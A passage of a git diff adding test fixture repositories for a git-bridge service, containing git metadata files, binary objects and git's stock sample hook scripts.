b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD new file mode 100644 index 0000000..a82c298 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/HEAD @@ -0,0 +1,2 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..a82c298 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/logs/refs/heads/master @@ -0,0 +1,2 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a new file mode 100644 index 0000000..72a979b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 new file mode 100644 index 0000000..fddf852 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 new file mode 100644 index 0000000..f58821d --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 @@ -0,0 +1,3 @@ +x +!>܃pt";i *l~>A,,w +6qk`!"OÔI'BZT-ϱKF+rl}8yFUͤԥpa 6> \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 new file mode 100644 index 0000000..e7279a2 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 new file mode 100644 index 0000000..5678b62 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 new file mode 100644 index 0000000..7112238 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master new file mode 100644 index 0000000..60f255a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/DOTgit/refs/heads/master @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/repo/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index new file mode 100644 index 0000000..ac6d4fd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs new file mode 100644 index 0000000..9c9037a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/HEAD 